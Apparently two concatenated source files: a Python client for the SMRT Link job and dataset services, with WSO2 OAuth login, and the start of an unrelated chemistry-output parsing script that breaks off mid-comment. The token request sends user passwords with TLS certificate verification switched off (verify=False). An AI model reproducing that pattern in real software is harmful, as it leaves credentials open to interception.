        job_result = self.run_import_dataset_by_type(dataset_meta_type.metatype, path, avoid_duplicate_import=avoid_duplicate_import)
        log.info("Confirming database update")
        # validation 1: attempt to retrieve dataset info
        result_new = self.get_dataset_by_uuid(dataset_meta_type.uuid)
        if result_new is None:
            raise JobExeError(("Dataset {u} was imported but could " +
                               "not be retrieved; this may indicate " +
                               "XML schema errors.").format(
                                   u=dataset_meta_type.uuid))
        return job_result
    else:
        log.info("{f} already imported. Skipping importing. {r}".format(r=result, f=dataset_meta_type.metatype))
        # need to clean this up
        # NOTE(review): assumes the dataset record carries the original
        # import job id under 'jobId' -- confirm against the server model
        return JobResult(self.get_job_by_id(result['jobId']), 0, "")
def get_dataset_children_jobs(self, dataset_id):
    """
    Get a List of Children Jobs for the DataSet
    :param dataset_id: DataSet Int or UUID
    :type dataset_id: int | string
    :rtype list[ServiceJob]
    """
    return _process_rget_with_jobs_transform(
        _to_url(self.uri, "{t}/datasets/{i}/jobs".format(t=ServiceAccessLayer.ROOT_SL, i=dataset_id)), headers=self._get_headers())

def get_job_types(self):
    """Get the list of job types supported by the server."""
    u = _to_url(self.uri, "{}/{}".format(ServiceAccessLayer.ROOT_JM, "job-types"))
    return _process_rget(u, headers=self._get_headers())

def get_dataset_types(self):
    """Get a List of DataSet Types"""
    u = _to_url(self.uri, "{}/{}".format(ServiceAccessLayer.ROOT_SL, "dataset-types"))
    return _process_rget(u, headers=self._get_headers())

def get_dataset_by_uuid(self, int_or_uuid, ignore_errors=False):
    """The recommend model is to look up DataSet type by explicit MetaType

    Returns None if the dataset was not found
    :param ignore_errors: if True, request errors are swallowed and None
        is returned instead of raising
    """
    return _process_rget_or_none(_null_func, ignore_errors=ignore_errors)(
        _to_url(self.uri, "{p}/{i}".format(i=int_or_uuid,
                                           p=ServiceAccessLayer.ROOT_DS)),
        headers=self._get_headers())
def get_dataset_by_id(self, dataset_type, int_or_uuid):
    """Get a Dataset using the DataSetMetaType and (int|uuid) of the dataset"""
    ds_endpoint = _get_endpoint_or_raise(dataset_type)
    return _process_rget(_to_url(self.uri, "{p}/{t}/{i}".format(t=ds_endpoint, i=int_or_uuid, p=ServiceAccessLayer.ROOT_DS)), headers=self._get_headers())

def _get_dataset_details_by_id(self, dataset_type, int_or_uuid):
    """
    Get a Dataset Details (XML converted to JSON via webservices)
    using the DataSetMetaType and (int|uuid) of the dataset
    """
    # FIXME There's some inconsistencies in the interfaces with regards to returning None or raising
    ds_endpoint = _get_endpoint_or_raise(dataset_type)
    return _process_rget(_to_url(self.uri, "{p}/{t}/{i}/details".format(t=ds_endpoint, i=int_or_uuid, p=ServiceAccessLayer.ROOT_DS)), headers=self._get_headers())

def _get_datasets_by_type(self, dstype):
    """List all datasets of the given endpoint slug (e.g., "subreads")."""
    return _process_rget(_to_url(self.uri, "{p}/{i}".format(i=dstype, p=ServiceAccessLayer.ROOT_DS)), headers=self._get_headers())
# --- Typed convenience wrappers over the generic dataset endpoints ---

def get_subreadset_by_id(self, int_or_uuid):
    """Get a SubreadSet by int id or UUID."""
    return self.get_dataset_by_id(FileTypes.DS_SUBREADS, int_or_uuid)

def get_subreadset_details_by_id(self, int_or_uuid):
    """Get SubreadSet details (XML as JSON) by int id or UUID."""
    return self._get_dataset_details_by_id(FileTypes.DS_SUBREADS, int_or_uuid)

def get_subreadsets(self):
    """List all SubreadSets."""
    return self._get_datasets_by_type("subreads")

def get_hdfsubreadset_by_id(self, int_or_uuid):
    """Get an HdfSubreadSet by int id or UUID."""
    return self.get_dataset_by_id(FileTypes.DS_SUBREADS_H5, int_or_uuid)

def get_hdfsubreadset_details_by_id(self, int_or_uuid):
    """Get HdfSubreadSet details (XML as JSON) by int id or UUID."""
    return self._get_dataset_details_by_id(FileTypes.DS_SUBREADS_H5, int_or_uuid)

def get_hdfsubreadsets(self):
    """List all HdfSubreadSets."""
    return self._get_datasets_by_type("hdfsubreads")

def get_referenceset_by_id(self, int_or_uuid):
    """Get a ReferenceSet by int id or UUID."""
    return self.get_dataset_by_id(FileTypes.DS_REF, int_or_uuid)

def get_referenceset_details_by_id(self, int_or_uuid):
    """Get ReferenceSet details (XML as JSON) by int id or UUID."""
    return self._get_dataset_details_by_id(FileTypes.DS_REF, int_or_uuid)

def get_referencesets(self):
    """List all ReferenceSets."""
    return self._get_datasets_by_type("references")

def get_barcodeset_by_id(self, int_or_uuid):
    """Get a BarcodeSet by int id or UUID."""
    return self.get_dataset_by_id(FileTypes.DS_BARCODE, int_or_uuid)

def get_barcodeset_details_by_id(self, int_or_uuid):
    """Get BarcodeSet details (XML as JSON) by int id or UUID."""
    return self._get_dataset_details_by_id(FileTypes.DS_BARCODE, int_or_uuid)

def get_barcodesets(self):
    """List all BarcodeSets."""
    return self._get_datasets_by_type("barcodes")

def get_alignmentset_by_id(self, int_or_uuid):
    """Get an AlignmentSet by int id or UUID."""
    return self.get_dataset_by_id(FileTypes.DS_ALIGN, int_or_uuid)

def get_alignmentset_details_by_id(self, int_or_uuid):
    """Get AlignmentSet details (XML as JSON) by int id or UUID."""
    return self._get_dataset_details_by_id(FileTypes.DS_ALIGN, int_or_uuid)

def get_ccsreadset_by_id(self, int_or_uuid):
    """Get a ConsensusReadSet by int id or UUID."""
    return self.get_dataset_by_id(FileTypes.DS_CCS, int_or_uuid)

def get_ccsreadset_details_by_id(self, int_or_uuid):
    """Get ConsensusReadSet details (XML as JSON) by int id or UUID."""
    return self._get_dataset_details_by_id(FileTypes.DS_CCS, int_or_uuid)

def get_ccsreadsets(self):
    """List all ConsensusReadSets."""
    return self._get_datasets_by_type("ccsreads")

def get_alignmentsets(self):
    """List all AlignmentSets."""
    return self._get_datasets_by_type("alignments")
def import_fasta(self, fasta_path, name, organism, ploidy):
    """Convert fasta file to a ReferenceSet and Import. Returns a Job """
    d = dict(path=fasta_path,
             name=name,
             organism=organism,
             ploidy=ploidy)
    return _process_rpost_with_transform(ServiceJob.from_d)(self._to_url("{p}/{t}".format(p=ServiceAccessLayer.ROOT_JOBS, t=JobTypes.CONVERT_FASTA)), d, headers=self._get_headers())

def run_import_fasta(self, fasta_path, name, organism, ploidy, time_out=JOB_DEFAULT_TIMEOUT):
    """Convert a fasta to a ReferenceSet, import it, and block until done.

    :rtype: JobResult
    """
    job_or_error = self.import_fasta(fasta_path, name, organism, ploidy)
    _d = dict(f=fasta_path, n=name, o=organism, p=ploidy)
    custom_err_msg = "Fasta-convert path:{f} name:{n} organism:{o} ploidy:{p}".format(**_d)
    job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
    return _block_for_job_to_complete(self, job_id, time_out=time_out,
                                      sleep_time=self._sleep_time)
def create_logger_resource(self, idx, name, description):
    """Create a logger resource on the server."""
    _d = dict(id=idx, name=name, description=description)
    return _process_rpost(_to_url(self.uri, "/smrt-base/loggers"), _d, headers=self._get_headers())

def log_progress_update(self, job_type_id, job_id, message, level, source_id):
    """This is the generic job logging mechanism"""
    _d = dict(message=message, level=level, sourceId=source_id)
    return _process_rpost(_to_url(self.uri, "{p}/{t}/{i}/log".format(t=job_type_id, i=job_id, p=ServiceAccessLayer.ROOT_JOBS)), _d, headers=self._get_headers())

def get_pipeline_template_by_id(self, pipeline_template_id):
    """Get a pipeline template resource by its id."""
    return _process_rget(_to_url(self.uri, "{p}/{i}".format(i=pipeline_template_id, p=ServiceAccessLayer.ROOT_PT)), headers=self._get_headers())
def create_by_pipeline_template_id(self,
                                   name,
                                   pipeline_template_id,
                                   epoints,
                                   task_options=(),
                                   workflow_options=(),
                                   tags=()):
    """Creates and runs a pbsmrtpipe pipeline by pipeline template id

    :param name: display name of the job
    :param pipeline_template_id: id of the pipeline template to run
    :param epoints: entry points (objects with entry_id, dataset_type, resource)
    :param task_options: iterable of task option dicts
    :param workflow_options: iterable of workflow option dicts
    :param tags: Tags should be a set of strings
    :rtype: ServiceJob
    :raises NotImplementedError: for legacy "pbsmrtpipe" pipeline ids
    """
    if pipeline_template_id.startswith("pbsmrtpipe"):
        raise NotImplementedError("pbsmrtpipe is no longer supported")
    # sanity checking to see if pipeline is valid (raises if the template
    # cannot be retrieved)
    _ = self.get_pipeline_template_by_id(pipeline_template_id)
    seps = [dict(entryId=e.entry_id, fileTypeId=e.dataset_type, datasetId=e.resource) for e in epoints]
    d = dict(name=name,
             pipelineId=pipeline_template_id,
             entryPoints=seps,
             taskOptions=list(task_options),
             workflowOptions=workflow_options)
    # Only add tags to the request if non-empty.
    if tags:
        d['tags'] = ",".join(tags)
    raw_d = _process_rpost(_to_url(self.uri, "{r}/{p}".format(p=JobTypes.ANALYSIS, r=ServiceAccessLayer.ROOT_JOBS)), d, headers=self._get_headers())
    return ServiceJob.from_d(raw_d)
def run_by_pipeline_template_id(self,
                                name,
                                pipeline_template_id,
                                epoints,
                                task_options=(),
                                workflow_options=(),
                                time_out=JOB_DEFAULT_TIMEOUT,
                                tags=(),
                                abort_on_interrupt=True):
    """Blocks and runs a job with a timeout

    :rtype: JobResult
    """
    job_or_error = self.create_by_pipeline_template_id(
        name,
        pipeline_template_id,
        epoints,
        task_options=task_options,
        workflow_options=workflow_options,
        tags=tags)
    _d = dict(name=name, p=pipeline_template_id, eps=epoints)
    custom_err_msg = "Job {n} args: {a}".format(n=name, a=_d)
    job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
    return _block_for_job_to_complete(self, job_id, time_out=time_out,
                                      sleep_time=self._sleep_time,
                                      abort_on_interrupt=abort_on_interrupt)
def run_cromwell_workflow(self,
                          name,
                          workflow_source,
                          inputs_json,
                          engine_options,
                          dependencies_zip,
                          time_out=JOB_DEFAULT_TIMEOUT,
                          tags=(),
                          abort_on_interrupt=True):
    """Submit a Cromwell workflow job and block until it completes.

    :param workflow_source: workflow source (path or literal WDL -- TODO confirm
        which the server expects)
    :rtype: JobResult
    """
    d = dict(
        name=name,
        workflowSource=workflow_source,
        inputsJson=inputs_json,
        engineOptions=engine_options,
        dependenciesZip=dependencies_zip)
    # Only send tags if non-empty
    if tags:
        tags_str = ",".join(list(tags))
        d['tags'] = tags_str
    raw_d = _process_rpost(_to_url(self.uri, "{r}/{p}".format(p=JobTypes.CROMWELL, r=ServiceAccessLayer.ROOT_JOBS)), d, headers=self._get_headers())
    job = ServiceJob.from_d(raw_d)
    return _block_for_job_to_complete(self, job.id, time_out=time_out,
                                      sleep_time=self._sleep_time,
                                      abort_on_interrupt=abort_on_interrupt)
def terminate_job(self, job):
    """
    POST a terminate request appropriate to the job type. Currently only
    supported for pbsmrtpipe, cromwell, and analysis job types.

    :type job: ServiceJob
    """
    # Logger.warn is deprecated (removed in Python 3.13); use warning()
    log.warning("Terminating job {i} ({u})".format(i=job.id, u=job.uuid))
    if job.external_job_id is not None:
        log.warning("Will abort Cromwell workflow %s", job.external_job_id)
    return _process_rpost(
        _to_url(self.uri, "{r}/{p}/{i}/terminate".format(
            p=job.job_type,
            r=ServiceAccessLayer.ROOT_JOBS,
            i=job.id)),
        {},
        headers=self._get_headers())

def terminate_job_id(self, job_id):
    """Look up a job by id (raising KeyError if missing) and terminate it."""
    job = _get_job_by_id_or_raise(self, job_id, KeyError)
    return self.terminate_job(job)
def resume_job(self,
               job_id,
               time_out=JOB_DEFAULT_TIMEOUT,
               abort_on_interrupt=True):
    """Block on an existing job until it completes.

    If the job is already in a completed state, return immediately.
    :rtype: JobResult
    """
    job = _get_job_by_id_or_raise(self, job_id, KeyError)
    if job.state in JobStates.ALL_COMPLETED:
        return JobResult(job, 0, "")
    return _block_for_job_to_complete(self, job.id, time_out=time_out,
                                      sleep_time=self._sleep_time,
                                      abort_on_interrupt=abort_on_interrupt)
def get_analysis_job_tasks(self, job_id_or_uuid):
    """Get all the Task associated with a Job by UUID or Int Id"""
    job_url = self._to_url(_to_relative_tasks_url(JobTypes.ANALYSIS)(job_id_or_uuid))
    return _process_rget_with_transform(_transform_job_tasks)(job_url, headers=self._get_headers())

def get_import_job_tasks(self, job_id_or_uuid):
    """Get the tasks of an import-dataset job."""
    # this is more for testing purposes
    job_url = self._to_url(_to_relative_tasks_url(JobTypes.IMPORT_DS)(job_id_or_uuid))
    return _process_rget_with_transform(_transform_job_tasks)(job_url, headers=self._get_headers())

def get_manifests(self):
    """Get the list of installed component manifests."""
    u = self._to_url("{}/manifests".format(ServiceAccessLayer.ROOT_SL))
    return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())

def get_manifest_by_id(self, ix):
    """Get a single component manifest, or None if not found."""
    u = self._to_url("{}/manifests/{}".format(ServiceAccessLayer.ROOT_SL, ix))
    return _process_rget_or_none(_null_func)(u, headers=self._get_headers())

def get_runs(self):
    """Get the list of runs."""
    u = self._to_url("{}".format(ServiceAccessLayer.ROOT_RUNS))
    return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())

def get_run_details(self, run_uuid):
    """Get a single run by UUID, or None if not found."""
    u = self._to_url("{}/{}".format(ServiceAccessLayer.ROOT_RUNS, run_uuid))
    return _process_rget_or_none(_null_func)(u, headers=self._get_headers())

def get_run_collections(self, run_uuid):
    """Get the collections belonging to a run."""
    u = self._to_url("{}/{}/collections".format(ServiceAccessLayer.ROOT_RUNS, run_uuid))
    return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())

def get_run_collection(self, run_uuid, collection_uuid):
    """Get a single collection of a run, or None if not found."""
    u = self._to_url("{}/{}/collections/{}".format(ServiceAccessLayer.ROOT_RUNS, run_uuid, collection_uuid))
    return _process_rget_or_none(_null_func)(u, headers=self._get_headers())

def get_samples(self):
    """Get the list of samples."""
    u = self._to_url("{}/samples".format(ServiceAccessLayer.ROOT_SL, ))
    return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())

def get_sample_by_id(self, sample_uuid):
    """Get a single sample by UUID, or None if not found."""
    u = self._to_url("{}/samples/{}".format(ServiceAccessLayer.ROOT_SL, sample_uuid))
    return _process_rget_or_none(_null_func)(u, headers=self._get_headers())

def submit_multi_job(self, job_options):
    """Submit a multi-analysis job; returns the created ServiceJob."""
    u = self._to_url("{}/multi-analysis".format(ServiceAccessLayer.ROOT_MJOBS))
    return _process_rpost_with_transform(ServiceJob.from_d)(u, job_options, headers=self._get_headers())
def __run_and_ignore_errors(f, warn_message):
    """
    Black hole ignoring exceptions from a func with no-args and
    logging the error as a warning. Returns None when *f* raised.
    """
    try:
        return f()
    except Exception as e:
        # Logger.warn is deprecated (removed in Python 3.13); use warning()
        log.warning(warn_message + " {e}".format(e=e))


def _run_func(f, warn_message, ignore_errors=True):
    """Call no-arg *f*; if ignore_errors, swallow and log failures instead of raising."""
    if ignore_errors:
        return __run_and_ignore_errors(f, warn_message)
    else:
        return f()
def log_pbsmrtpipe_progress(total_url, message, level, source_id, ignore_errors=True, headers=None):  # pragma: no cover
    """Log the status of a pbsmrtpipe to SMRT Server"""
    # Keeping this as public to avoid breaking pbsmrtpipe. The
    # new public interface should be the JobServiceClient
    # Need to clarify the model here. Trying to pass the most minimal
    # data necessary to pbsmrtpipe.
    _d = dict(message=message, level=level, sourceId=source_id)
    warn_message = "Failed Request to {u} data: {d}".format(u=total_url, d=_d)

    # deferred so _run_func can optionally swallow request failures
    def f():
        return _process_rpost(total_url, _d, headers=headers)

    return _run_func(f, warn_message, ignore_errors=ignore_errors)
def add_datastore_file(total_url, datastore_file, ignore_errors=True, headers=None):  # pragma: no cover
    """Add datastore to SMRT Server

    :type datastore_file: DataStoreFile
    """
    # Keeping this as public to avoid breaking pbsmrtpipe. The
    # new public interface should be the JobServiceClient
    _d = datastore_file.to_dict()
    warn_message = "Failed Request to {u} data: {d}.".format(u=total_url, d=_d)

    # deferred so _run_func can optionally swallow request failures
    def f():
        return _process_rpost(total_url, _d, headers=headers)

    return _run_func(f, warn_message, ignore_errors=ignore_errors)
def _create_job_task(job_tasks_url, create_job_task_record, ignore_errors=True, headers=None):  # pragma: no cover
    """
    POST a new task record to a job's tasks endpoint.

    :type create_job_task_record: CreateJobTaskRecord
    :rtype: JobTask
    """
    warn_message = "Unable to create Task {c}".format(c=repr(create_job_task_record))

    # deferred so _run_func can optionally swallow request failures
    def f():
        return _process_rpost_with_transform(JobTask.from_d)(job_tasks_url, create_job_task_record.to_dict(), headers=headers)

    return _run_func(f, warn_message, ignore_errors)
def _update_job_task_state(task_url, update_job_task_record, ignore_errors=True, headers=None):  # pragma: no cover
    """
    PUT an updated state for an existing job task.

    :type update_job_task_record: UpdateJobTaskRecord
    :rtype: JobTask
    """
    warn_message = "Unable to update Task {c}".format(c=repr(update_job_task_record))

    # deferred so _run_func can optionally swallow request failures
    def f():
        return _process_rput_with_transform(JobTask.from_d)(task_url, update_job_task_record.to_dict(), headers=headers)

    return _run_func(f, warn_message, ignore_errors)
def _update_datastore_file(datastore_url, uuid, path, file_size, set_is_active,
                           ignore_errors=True, headers=None):  # pragma: no cover
    """PUT an update (size/path/active flag) for one datastore file."""
    warn_message = "Unable to update datastore file {u}".format(u=uuid)
    total_url = "{b}/{u}".format(b=datastore_url, u=uuid)
    d = {"fileSize": file_size, "path": path, "isActive": set_is_active}

    # deferred so _run_func can optionally swallow request failures
    def f():
        return _process_rput(total_url, d, headers=headers)

    return _run_func(f, warn_message, ignore_errors)
class CreateJobTaskRecord(object):
    """Payload describing a new task record to be created under a job."""

    def __init__(self, task_uuid, task_id, task_type_id, name, state, created_at=None):
        self.task_uuid = task_uuid
        self.task_id = task_id
        self.task_type_id = task_type_id
        self.name = name
        # this must be consistent with the EngineJob states in the scala code
        self.state = state
        # The created_at timestamp must have the form
        # 2016-02-18T23:24:46.569Z
        # or
        # 2016-02-18T15:24:46.569-08:00
        if created_at is None:
            created_at = datetime.datetime.now(pytz.utc)
        self.created_at = created_at

    def __repr__(self):
        return "<{k} uuid:{u} ix:{i} state:{s} name:{n} >".format(
            k=self.__class__.__name__,
            u=self.task_uuid,
            i=self.task_id,
            s=self.state,
            n=self.name)

    def to_dict(self):
        """Serialize to the JSON-ready dict expected by the services."""
        return {
            "uuid": self.task_uuid,
            "taskId": self.task_id,
            "taskTypeId": self.task_type_id,
            "name": self.name,
            "state": self.state,
            "createdAt": self.created_at.isoformat(),
        }
class UpdateJobTaskRecord(object):
    """Payload for updating the state of an existing job task."""

    def __init__(self, task_uuid, state, message, error_message=None):
        """:type error_message: str | None"""
        self.task_uuid = task_uuid
        self.state = state
        self.message = message
        # detailed error message (e.g., terse stack trace)
        self.error_message = error_message

    @staticmethod
    def from_error(task_uuid, state, message, error_message):
        """Alternate constructor for failures; a detailed error message is required."""
        return UpdateJobTaskRecord(task_uuid, state,
                                   message,
                                   error_message=error_message)

    def __repr__(self):
        return "<{k} i:{i} state:{s} >".format(k=self.__class__.__name__,
                                               i=self.task_uuid,
                                               s=self.state)

    def to_dict(self):
        out = {"uuid": self.task_uuid,
               "state": self.state,
               "message": self.message}
        # spray API is a little odd here. it will complain about
        # Expected String as JsString, but got null
        # even though the model is Option[String]
        if self.error_message is not None:
            out['errorMessage'] = self.error_message
        return out
class JobServiceClient(object):  # pragma: no cover
    """Thin client bound to a single job's root URL.

    Keeping this class private. It should only be used from pbsmrtpipe.

    This hides the root location of the URL and hides the job id (as an
    int or uuid). The Url has the form:

    http://localhost:8888/smrt-link/job-manager/jobs/pbsmrtpipe/1234
    or
    http://localhost:8888/smrt-link/job-manager/jobs/pbsmrtpipe/5d562c74-e452-11e6-8b96-3c15c2cc8f88
    """

    def __init__(self, job_root_url, ignore_errors=False):
        """
        :param job_root_url: Full Root URL to the job
        :type job_root_url: str
        :param ignore_errors: Only log errors, don't raise if a request
            fails. Intended for fire-and-forget usage.
        :type ignore_errors: bool
        """
        self.job_root_url = job_root_url
        self.ignore_errors = ignore_errors

    def __repr__(self):
        return "<{k} Job URL:{u} >".format(k=self.__class__.__name__,
                                           u=self.job_root_url)

    def _get_headers(self):
        return Constants.HEADERS

    def to_url(self, segment):
        """Append *segment* to the job root URL."""
        return "{i}/{s}".format(i=self.job_root_url, s=segment)

    @property
    def log_url(self):
        return self.to_url("log")

    @property
    def datastore_url(self):
        return self.to_url("datastore")

    @property
    def tasks_url(self):
        return self.to_url("tasks")

    def get_task_url(self, task_uuid):
        """
        :param task_uuid: Task UUID
        :return: URL of the single-task resource
        """
        return self.to_url("tasks/{t}".format(t=task_uuid))

    def log_workflow_progress(self, message, level, source_id, ignore_errors=True):
        """Send a progress/log message for this job."""
        return log_pbsmrtpipe_progress(self.log_url, message, level, source_id, ignore_errors=ignore_errors)

    def add_datastore_file(self, datastore_file, ignore_errors=True):
        """Register a new DataStoreFile with this job."""
        return add_datastore_file(self.datastore_url, datastore_file, ignore_errors=ignore_errors)

    def update_datastore_file(self, uuid, file_size=None, path=None, set_is_active=True, ignore_errors=True):
        """Update size/path/active flag of an existing datastore file."""
        return _update_datastore_file(self.datastore_url, uuid, path, file_size, set_is_active, ignore_errors)

    def create_task(self, task_uuid, task_id, task_type_id, name, created_at=None):
        """
        :param task_uuid: Globally unique task id
        :param task_id: Unique within respect to the job
        :param task_type_id: ToolContract or task id (e.g., pbcommand.tasks.alpha)
        :param name: Display name of task
        :param created_at: time task was created at (current time if None)
        """
        record = CreateJobTaskRecord(task_uuid, task_id, task_type_id,
                                     name, JobStates.CREATED, created_at=created_at)
        return _create_job_task(self.tasks_url, record)

    def update_task_status(self, task_uuid, state, message, error_message=None):
        """Set the state/message of an existing task."""
        record = UpdateJobTaskRecord(task_uuid, state, message, error_message=error_message)
        return _update_job_task_state(self.get_task_url(task_uuid), record, ignore_errors=self.ignore_errors)

    def update_task_to_failed(self, task_uuid, message, detailed_error_message):
        """Mark a task as FAILED with a detailed error message."""
        record = UpdateJobTaskRecord(task_uuid,
                                     JobStates.FAILED,
                                     message,
                                     error_message=detailed_error_message)
        return _update_job_task_state(self.get_task_url(task_uuid), record)
#-----------------------------------------------------------------------
# SSL stuff
class Wso2Constants(object):  # pragma: no cover
    """OAuth2 client constants for the WSO2 API gateway."""
    # NOTE(review): secret/consumer key appear scrubbed from this copy of the source
    SECRET = "<KEY>"
    CONSUMER_KEY = "<KEY>"
    # OAuth scopes requested for the SMRT Link APIs
    SCOPES = ["welcome", "run-design", "run-qc", "openid", "analysis",
              "sample-setup", "data-management", "userinfo"]
def _create_auth(secret, consumer_key):  # pragma: no cover
    """Build the HTTP Basic auth payload for the WSO2 token request.

    base64.b64encode requires a bytes-like argument under Python 3 (the
    previous str argument raised TypeError), and the result is decoded
    back to str so it can be embedded cleanly in an Authorization header
    (avoiding the "Basic b'...'" formatting bug).
    """
    return base64.b64encode(":".join([secret, consumer_key]).encode("utf-8")).decode("ascii")
def get_token(url, user, password, scopes, secret, consumer_key):  # pragma: no cover
    """POST a WSO2 password-grant token request and return the raw response.

    :param scopes: iterable of OAuth scope strings
    :rtype: requests.Response
    """
    basic_auth = _create_auth(secret, consumer_key)
    # To be explicit for pedagogical purposes
    headers = {
        "Authorization": "Basic {}".format(basic_auth),
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # De-duplicate while preserving the caller's order; joining a set (as
    # the previous code did) produced a nondeterministic scope string.
    scope_str = " ".join(dict.fromkeys(scopes))
    payload = dict(grant_type="password",
                   username=user,
                   password=password,
                   scope=scope_str)
    # verify is false to disable the SSL cert verification
    # SECURITY NOTE: this skips certificate validation; acceptable only
    # for trusted/internal endpoints.
    return requests.post(url, payload, headers=headers, verify=False)
def _get_smrtlink_wso2_token(user, password, url):  # pragma: no cover
    """Request a WSO2 token; returns (access_token, refresh_token, scopes).

    :raises KeyError: if the response JSON lacks the expected fields
    """
    r = get_token(url, user, password, Wso2Constants.SCOPES, Wso2Constants.SECRET, Wso2Constants.CONSUMER_KEY)
    j = r.json()
    access_token = j['access_token']
    refresh_token = j['refresh_token']
    # the granted scopes come back as a single space-separated string
    scopes = j['scope'].split(" ")
    return access_token, refresh_token, scopes
class SmrtLinkAuthClient(ServiceAccessLayer):  # pragma: no cover
    """
    HTTPS-enabled client that routes via WSO2 and requires authentication.
    For internal use only - this is NOT an officially supported API. Currently
    somewhat sloppy w.r.t. SSL security features.
    """

    def __init__(self, base_url, user, password, port=8243, debug=False,
                 sleep_time=2, token=None):
        """
        :param token: pre-existing auth token; if None, user and password
            are required and a token is fetched immediately via _login()
        """
        super(SmrtLinkAuthClient, self).__init__(base_url, port, debug=debug, sleep_time=sleep_time)
        self._user = user
        self._password = password
        if token is None:
            if (user is None or password is None):
                raise ValueError("Both user and password must be defined unless an existing auth token is supplied")
            self._login()
        else:
            # assume token is valid. This will fail on the first client request if not valid with an obvious error message
            self.auth_token = token
            self.refresh_token = None

    def _login(self):
        # Fetch (access, refresh) tokens from the WSO2 /token endpoint
        url = "{u}:{p}/token".format(u=self.base_url, p=self.port)
        self.auth_token, self.refresh_token, _ = _get_smrtlink_wso2_token(self._user, self._password, url)

    def _get_headers(self):
        # Bearer auth replaces the plain headers of the parent class
        return {
            "Authorization": "Bearer {}".format(self.auth_token),
            "Content-type": "application/json"
        }

    def _to_base_url(self, h):
        # Force an https:// scheme; plain http is rejected outright
        if h.startswith("http://"):
            raise ValueError("Invalid URL - this client requires HTTPS")
        prefix = "https://"
        return h if h.startswith(prefix) else prefix + h

    @property
    def uri(self):
        # WSO2 routes SMRT Link under a versioned API prefix
        return "{b}:{u}/SMRTLink/1.0.0".format(b=self.base_url, u=self.port)

    def reauthenticate_if_necessary(self):
        """
        Check whether the client still has authorization to access the /status
        endpoint, and acquire a new auth token if not.
        """
        try:
            status = self.get_status()  # return value intentionally unused
        except requests.exceptions.HTTPError as e:
            if e.response.status_code == 401:
                self._login()
            else:
                raise e
def get_smrtlink_client(host, port, user=None, password=None, sleep_time=5):  # pragma: no cover
    """
    Convenience method for use in CLI testing tools. Returns an instance of
    the appropriate client class given the input parameters. Unlike the client
    itself this hardcodes 8243 as the WSO2 port number.

    An authenticated client is used when the host is not localhost, or when
    both user and password were supplied; otherwise a plain client on *port*.
    """
    if host != "localhost" or None not in [user, password]:
        # NOTE: 'port' is intentionally ignored here; SmrtLinkAuthClient
        # defaults to the WSO2 port (8243)
        return SmrtLinkAuthClient(host, user, password, sleep_time=sleep_time)
    else:
        return ServiceAccessLayer(host, port, sleep_time=sleep_time)
|
<reponame>berquist/sgr_analysis
"""sapt_vs_almo.py: Parse a set of ALMO output files for their
interaction energy components, writing to a CSV file."""
from glob import glob
import csv
import os.path
import numpy as np
from sgr_analysis.sapt.helpers import (BIN_TO_WEIGHT_MAP, read_psi4_sapt0_with_snapnum_and_weight,
read_qchem_eda_v1, snapnum_to_bin_map)
from sgr_analysis.sapt.summary import method_basis_outer_product
if __name__ == '__main__':
    # Input locations (hard-coded to the original author's machine)
    root_dir = '/home/eric/Chemistry/calc.sgr/paper_02_CD_SC/sapt/sapt_vs_almo/'
    root_dir_sapt = '/home/eric/Chemistry/calc.sgr/paper_02_CD_SC/sapt/631gdp/ct/'
    root_dir_paper1 = '/home/eric/Chemistry/calc.sgr/paper_02_CD_SC/sapt/almo_eda_paper1/'
    # ALMO-EDA outputs: one batch per (method, basis, counterpoise) combination
    filenames_hf_cp = sorted(glob(root_dir + '*hf_6-31gss_cp.out'))
    filenames_hf_nocp = sorted(glob(root_dir + '*hf_6-31gss_nocp.out'))
    filenames_b3lyp_cp = sorted(glob(root_dir + '*b3lyp_6-31gss_cp.out'))
    filenames_b3lyp_nocp = sorted(glob(root_dir + '*b3lyp_6-31gss_nocp.out'))
    filenames_b3lypd2_cp = sorted(glob(root_dir + '*b3lyp-d2_6-31gss_cp.out'))
    filenames_b3lypd2_nocp = sorted(glob(root_dir + '*b3lyp-d2_6-31gss_nocp.out'))
    filenames_b3lypd3_cp = sorted(glob(root_dir + '*b3lyp-d3_6-31gss_cp.out'))
    filenames_b3lypd3_nocp = sorted(glob(root_dir + '*b3lyp-d3_6-31gss_nocp.out'))
    filenames_wb97xd_pople_cp = sorted(glob(root_dir + '*wb97x-d_6-31gss_cp.out'))
    filenames_wb97xd_pople_nocp = sorted(glob(root_dir + '*wb97x-d_6-31gss_nocp.out'))
    filenames_wb97mv_pople_cp = sorted(glob(root_dir + '*wb97m-v_6-31gss_cp.out'))
    filenames_wb97mv_pople_nocp = sorted(glob(root_dir + '*wb97m-v_6-31gss_nocp.out'))
    filenames_wb97xd_dunning_cp = sorted(glob(root_dir + '*wb97x-d_cc-pvtz_cp.out'))
    filenames_wb97xd_dunning_nocp = sorted(glob(root_dir + '*wb97x-d_cc-pvtz_nocp.out'))
    filenames_wb97mv_dunning_cp = sorted(glob(root_dir + '*wb97m-v_cc-pvtz_cp.out'))
    filenames_wb97mv_dunning_nocp = sorted(glob(root_dir + '*wb97m-v_cc-pvtz_nocp.out'))
    filenames_sapt = sorted(glob(root_dir_sapt + '*.out'))
    filenames_paper1 = sorted(glob(root_dir_paper1 + '*.out'))
    batches = (
        filenames_hf_cp,
        filenames_hf_nocp,
        filenames_b3lyp_cp,
        filenames_b3lyp_nocp,
        filenames_b3lypd2_cp,
        filenames_b3lypd2_nocp,
        filenames_b3lypd3_cp,
        filenames_b3lypd3_nocp,
        filenames_wb97xd_pople_cp,
        filenames_wb97xd_pople_nocp,
        filenames_wb97mv_pople_cp,
        filenames_wb97mv_pople_nocp,
        filenames_wb97xd_dunning_cp,
        filenames_wb97xd_dunning_nocp,
        filenames_wb97mv_dunning_cp,
        filenames_wb97mv_dunning_nocp,
    )
    map_is_cp = {
        'cp': True,
        'nocp': False,
    }
    # Parse every ALMO output into almo_data[method][cp_flag][snapnum],
    # deriving method/snapshot/CP metadata from the filename stub
    snapnums = set()
    almo_data = dict()
    for batch in batches:
        for filename in batch:
            stub = os.path.splitext(os.path.basename(filename))[0]
            print(stub)
            stub_tokens = stub.split('_')
            # stub layout assumption: token 1 is the snapshot number and
